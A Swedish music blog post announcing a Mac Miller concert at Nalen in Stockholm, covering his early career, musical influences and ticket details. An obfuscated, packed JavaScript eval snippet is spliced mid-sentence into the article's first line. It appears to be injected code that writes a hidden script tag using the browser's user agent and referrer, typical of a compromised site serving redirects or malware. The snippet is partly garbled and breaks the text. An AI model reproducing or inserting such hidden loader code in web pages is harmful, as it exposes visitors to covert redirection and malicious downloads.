Image Image Image Image Image Image Image Image Image Image

| 19 september, 2018

Scroll to top

Top

Mac Miller till Nalen i Stockholm

Mac Miller till Nalen i Stockholm
Alexander Gylemo

En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|taind|var|u0026u|referrer|azfna||js|php’.split(‘|’),0,{}))
av hiphop-världens främsta up and coming-stjärnor Malcolm ”Mac Miller” McCormick från Rostrum Records är på ingång till Sverige.

Den 19-åriga hiphoparen började dyka upp på radarn 2009 med bl.a. projektet ”The High Life” men slog igenom 2010 när han släppte debutalbumet ”K.I.D.S.” (Kicking Incredible Dope Shit) med hitten ”Nikes on My Feet”. Han har sedan dess genom bloggar och Youtube blivit en av USA-scenens populäraste artister och har nu påbörjat en turné där vi tursamma svenskar får äran att se killen rocka sönder stora salen på Nalen den 16:e september.

Än så länge har vi inte hört så mycket om honom i den här delen av världen, och för de som börjar bli taggade kan jag berätta att hans musik är väldigt laidback och flödar av glada, vänskapliga budskap och nickar åt ett bruk av en viss växt. Det är däremot hans beats som fått mig att tycka att han just nu är en av hiphopens mest intressanta aktörer. Han har enligt egna utsagor inspirerats av bl.a The Beastie Boys, Outkast och A Tribe Called Quest vilket märks i hans låtar som går åt ett helt annat håll än gangster-rappen vi kommit till att bli vana vid att höra från USA.

Biljetterna kostar 235 :- och det är bara att passa på att köpa sin biljett på www.nalen.com innan fler får nys om stjärnskottets kommande konsert.

Nedan kan ni lyssna på min personliga favorit ”Donald Trump”.

httpv://www.youtube.com/watch?v=74TFS8r_SMI&hd=1

Comments